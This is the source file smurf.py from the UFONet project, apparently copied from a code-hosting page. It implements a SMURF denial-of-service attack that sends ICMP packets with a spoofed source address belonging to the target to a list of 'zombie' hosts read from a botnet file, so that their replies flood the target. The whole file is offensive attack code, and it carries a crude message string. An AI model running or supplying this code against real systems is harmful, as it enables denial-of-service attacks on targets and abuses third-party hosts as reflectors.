smurf.py 4.1 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107
  1. #!/usr/bin/env python3
  2. # -*- coding: utf-8 -*-"
  3. """
  4. This file is part of the UFONet project, https://ufonet.03c8.net
  5. Copyright (c) 2013/2024 | psy <epsylon@riseup.net>
  6. You should have received a copy of the GNU General Public License along
  7. with UFONet; if not, write to the Free Software Foundation, Inc., 51
  8. Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
  9. """
  10. import sys, random, socket
  11. import urllib.parse
  12. try:
  13. from scapy import *
  14. except:
  15. print("\nError importing: scapy lib.\n")
  16. sys.exit(2)
  17. # UFONet ICMP broadcast attack (SMURF)
  18. def randInt():
  19. x = random.randint(1,65535) # TCP ports
  20. return x
  21. def sIP(base_stations): # extract 'base stations'
  22. bs = {}
  23. s_zombie = random.choice(base_stations).strip() # shuffle 'base stations'
  24. if not s_zombie in bs:
  25. url = urllib.parse.urlparse(s_zombie)
  26. try:
  27. s_zombie_ip = socket.gethostbyname(url.netloc)
  28. bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
  29. except:
  30. try:
  31. import dns.resolver
  32. r = dns.resolver.Resolver()
  33. r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
  34. a = r.query(url.netloc, "A") # A record
  35. for rd in a:
  36. s_zombie_ip = str(rd)
  37. bs[s_zombie] = s_zombie_ip # add to dict of resolved domains
  38. except:
  39. s_zombie_ip = s_zombie
  40. else:
  41. s_zombie_ip = bs.get(s_zombie)
  42. return s_zombie_ip
  43. def smurfize(ip, sport, rounds):
  44. f = open('botnet/zombies.txt') # use 'zombies' as 'base stations'
  45. base_stations = f.readlines()
  46. base_stations = [ base_station.replace('\n','') for base_station in base_stations ]
  47. f.close()
  48. n=0
  49. try:
  50. for x in range (0,int(rounds)):
  51. n=n+1
  52. s_zombie_ip = sIP(base_stations)
  53. if s_zombie_ip == None: # not any 'base stations' available
  54. print("[Error] [AI] [SMURF] Imposible to retrieve 'base stations' -> [Aborting!]\n")
  55. break
  56. IP_p = IP()
  57. try:
  58. IP_p.src = ip # ICMP 'broadcast' package carring fraudulent (spoofed) source IP belonging to target (aka SMURF attack)
  59. except:
  60. print("[Error] [AI] [SMURF] Imposible to resolve IP from target! -> [Aborting!]\n")
  61. break
  62. try:
  63. IP_p.dst = s_zombie_ip
  64. except:
  65. print("[Error] [AI] [SMURF] Imposible to resolve IP from 'base station' -> [Aborting!]\n")
  66. break
  67. try:
  68. send(IP_p/ICMP(), verbose=0)
  69. print("[Info] [AI] [SMURF] Redirecting 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"] -> [RE-FLUXING!]")
  70. time.sleep(1) # sleep time required for balanced sucess
  71. except:
  72. print("[Error] [AI] [SMURF] Failed to redirect 'base station' ["+str(n)+"] ["+str(s_zombie_ip)+"]")
  73. except:
  74. print("[Error] [AI] [SMURF] Failing to engage... -> Is still target online? -> [Checking!]")
  75. class SMURF(object):
  76. def attacking(self, target, rounds):
  77. print("[Info] [AI] ICMP Broadcast (SMURF) is redirecting: [" , rounds, "base stations ]")
  78. if target.startswith('http://'):
  79. target = target.replace('http://','')
  80. sport = 80
  81. elif target.startswith('https://'):
  82. target = target.replace('https://','')
  83. sport = 443
  84. try:
  85. ip = socket.gethostbyname(target)
  86. except:
  87. try:
  88. import dns.resolver
  89. r = dns.resolver.Resolver()
  90. r.nameservers = ['8.8.8.8', '8.8.4.4'] # google DNS resolvers
  91. url = urlparse(target)
  92. a = r.query(url.netloc, "A") # A record
  93. for rd in a:
  94. ip = str(rd)
  95. except:
  96. ip = target
  97. if ip == "127.0.0.1" or ip == "localhost":
  98. print("[Info] [AI] [SMURF] Sending message '1/0 %====D 2 Ur ;-0' to 'localhost' -> [OK!]\n")
  99. return
  100. smurfize(ip, sport, rounds) # attack with SMURF using threading